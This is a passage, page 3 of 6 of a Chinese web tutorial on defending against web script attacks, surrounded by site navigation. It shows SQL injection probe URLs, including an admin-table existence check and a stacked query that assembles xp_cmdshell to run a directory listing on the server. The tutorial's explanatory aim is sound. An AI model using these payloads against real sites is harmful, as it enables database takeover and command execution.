相关文章  
  • 花 3 分钟来关闭你电脑上没用服务,让电脑百毒不侵、提速百倍

  • 解析江民杀毒软件反病毒核心技术

  • Hidden Users on Windows

  • ASP 木马 Webshell 安全解决方案

  • 无形的栅栏 - 完全解析 Windows 系统权限

  • 黑客入侵中常用的命令

  • 一气通杀国内软件防火墙的弱点

  • Windows 自启动程序的十大藏身之所

  • Windows操作系统“自启动”程序搜索大法

  • 技巧:保护 Windows 系统数据十招

    		•
      推荐  
      科普之友首页   专利     科普      动物      植物        天文   考古   前沿科技
     您现在的位置在:  首页 >>文献 >>培训

    网页脚本攻击防范全攻略3
    ?id=999 and 1=2

      http://127.0.0.1/forum/showuser.asp?id=999 and 0<>(select count(*) from admin)

      http://127.0.0.1/forum/showuser.asp?id=999’; declare @a sysname set @a=’xp_’+ ’cmdshell’ exec @a ’dir c:\’---&aid=9

      得到了管理员的密码也就意味着已经控制的整站,虽然不一定能得到主机的权限,但也为这一步做了很大的铺垫。类似的SQL Injection攻击的方式方法很多,对不同的文件过滤不严密所采取的查询方式也不同。所以说想做好一个完整的字符过滤程序不下一凡功夫是不可能的。

      4. 远程注入攻击

    页码:[1] [2] [3] [4] [5] [6]3页、共6页

         

          设为首页       |       加入收藏       |       广告服务       |       友情链接       |       版权申明      

    Copyriht 2007 - 2008 ©  科普之友 All right reserved